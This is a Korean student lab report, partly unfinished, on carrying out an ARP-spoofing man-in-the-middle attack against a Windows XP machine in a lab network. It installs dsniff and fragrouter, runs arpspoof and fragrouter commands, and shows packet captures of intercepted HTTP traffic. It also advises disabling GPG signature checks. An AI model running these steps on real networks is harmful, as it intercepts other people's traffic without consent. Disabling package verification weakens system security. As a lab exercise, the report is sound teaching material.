ARP REDIERCT 실습 레포트

목차
1. 구성과 계획
   1-1 목표
   1-2 네트워크 구성도
   1-3 실습 환경 개요
   1-4 실습 시나리오

2. 실습
   2-1 arpspoofing 사용을 위한 Dsniff 설치
   2-2 fragrouter 설치
   2-3 fragrouter 실행
   2-4 arpspoofing 실행

3. 결과 증명
   3-1 reply 패킷 캡처
   3-2 http 접속 요청 패킷 캡처

 

1.구성과 계획

1-1 목표
   ARP spoofing 공격을 통해 공격자의 맥주소를 라우터로 속이는 중간자 공격을 실습해본다

 

1-2 네트워크 구성도

1-3 실습 환경 개요

OS	IP	MAC	명칭
Linux CentOS 7	192.168.10.172	00:0C:29:0B:EC:FB	공격자
Win XP	192.168.10.129	00:0C:29:75:5E:D7	대상
Gateway	192.168.10.1	70:5D:CC:04:BE:B0	라우터

1-4 실습 시나리오
 1. dsniff 설치
 2. fragrouter 설치
 3. fragrouter 실행
 4. arpspoofing을 통한 arp redirect 실행

 

2. 실습

2-1 arpspoofing 사용을 위한 Dsniff 설치
#yum install –y dsniff


※trouble shooting
- dsniff 설치가 안될 때
Epel (Extra Packages for Enterprise Linux)에서 패키지가 제공되지만 Public Key 문제로 설치되지 않을 수 있다.
/etc/yum.repos.d/epel.repo 파일 내에 설정을 변경한다.

gpgcheck=1 -> gpgcheck=0으로 수정



2-2 Fragrouter 설치

fragrouter는 스니핑을 보조하는 도구인데 스니핑에 의해 패킷이 목적지에 도달하지 못하는 상황을 방지한다.

wget 명령어로 설치 파일을 다운로드한다.

#wget https://launchpad.net/ubuntu/+archive/primary/+sourcefiles/fragrouter/1.6-2.2/fragrouter_1.6.orig.tar.gz

#tar xvfz fragrouter_1.6.orig.tar.gz 명령어로 압축을 풀어준다.

 

#cd fragrouter_1.6.origz.tar.gz 압축 해제 후 압축 해제한 폴더로 이동한다.

 

#./configure 명령어로 스크립트를 실행한다.

 

#make 명령어로 컴파일 한다.

 

#make install 로 설치한다.

 

2-3 패킷의 포워딩을 위해 fragrouter를 실행한다.

#fragrouter –B1 

2-4 arpspoof를 이용 arp 리다이렉트 공격을 실행한다.

#arpspoof -i ens32 -t 192.168.10.129 192.168.10.1(설명 보충요망)

3. 결과 및 검증

 

3-1 reply 패킷 캡처
  공격자 (192.168.10.172)와 라우팅(192.168.10.1)의 맥주소가 일치되도록 나오면 성공이다.

패킷을 캡처해보면 공격자가 지속적으로 희생자에게 게이트웨이 대신 reply를 날리는 패킷을 확인할 수 있다.

 

0000 00 0c 29 75 5e d7¹) 00 0c 29 0b ec fb²) 08 06³) 00 01 ..)u^...).......

0010 08 00 06 04 00 02⁴) 00 0c 29 0b ec fb c0 a8 0a 01 ........).......

0020 00 0c 29 75 5e d7 c0 a8 0a 81 00 00 00 00 00 00 ..)u^...........

0030 00 00 00 00 00 00 00 00 00 00 00 00                ............

 

1) Destination 맥주소 : 00:0C:29:75:5E:D7

2) Source 맥주소 : 00:0C:29:0B:EC:FB

3) 0806 : Type : ARP

4) 00 02 : Opcode : reply (2)

 

3-2 http 접속 요청 패킷 캡처

대상자 win xp에서 네이버 접속을 시도하는 과정의 패킷을 캡처해보았다

 

0000 00 0c 29 0b ec fb 00 0c 29 75 5e d7 08 00 45 00 ..).....)u^...E.

0010 01 5e 2a f7 40 00 80 06 8b f9 c0 a8 0a 81 3d 6f .^*.@.........=o

0020 3a 11 07 7f 00 50 03 47 6a 2e c7 19 35 e4 50 18 :....P.Gj...5.P.

0030 43 6b 9b ef 00 00 47 45 54 20 2f 6c 69 62 73 2f Ck....GET /libs/

0040 65 78 74 65 72 6e 61 6c 2f 6a 73 2f 6a 71 75 65 external/js/jque

0050 72 79 2d 31 2e 38 2e 30 2e 6d 69 6e 2e 6a 73 3f ry-1.8.0.min.js?

0060 32 30 31 37 30 32 30 36 20 48 54 54 50 2f 31 2e 20170206 HTTP/1.

0070 31 0d 0a 41 63 63 65 70 74 3a 20 2a 2f 2a 0d 0a 1..Accept: */*..

0080 52 65 66 65 72 65 72 3a 20 68 74 74 70 3a 2f 2f Referer: http://

0090 6e 76 2e 76 65 74 61 2e 6e 61 76 65 72 2e 63 6f nv.veta.naver.co

00a0 6d 2f 66 78 73 68 6f 77 3f 73 75 3d 53 55 31 30 m/fxshow?su=SU10

00b0 36 34 31 26 6e 72 65 66 72 65 73 68 78 3d 30 0d 641&nrefreshx=0.

00c0 0a 41 63 63 65 70 74 2d 4c 61 6e 67 75 61 67 65 .Accept-Language

00d0 3a 20 6b 6f 0d 0a 41 63 63 65 70 74 2d 45 6e 63 : ko..Accept-Enc

00e0 6f 64 69 6e 67 3a 20 67 7a 69 70 2c 20 64 65 66 oding: gzip, def

00f0 6c 61 74 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 late..User-Agent

0100 3a 20 4d 6f 7a 69 6c 6c 61 2f 34 2e 30 20 28 63 : Mozilla/4.0 (c

0110 6f 6d 70 61 74 69 62 6c 65 3b 20 4d 53 49 45 20 ompatible; MSIE

0120 36 2e 30 3b 20 57 69 6e 64 6f 77 73 20 4e 54 20 6.0; Windows NT

0130 35 2e 31 3b 20 53 56 31 29 0d 0a 48 6f 73 74 3a 5.1; SV1)..Host:

0140 20 74 76 65 74 61 2e 6e 61 76 65 72 2e 6e 65 74 tveta.naver.net

0150 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 ..Connection: Ke

0160 65 70 2d 41 6c 69 76 65 0d 0a 0d 0a ep-Alive....

 

Destination 맥주소 공격자 linux의 맥주소와 동일하다 (더 자세한 설명추가요망)

Source 맥주소 대상자 win xp의 맥주소와 동일하다 (더 자세한 설명추가요망)

네이버에 접속을 시도했다는 증거

User-Agent는 접속한 기기의 정보를 나타내는 http에서 사용하는 메타 데이터다

Windows NT는 마이크로소프트 윈도 운영체제 제품군의 명칭으로 NT 5.1은 Windows xp를 뜻한다 즉 xp 환경에서 접속을 했다는 걸 알 수 있는 부분이다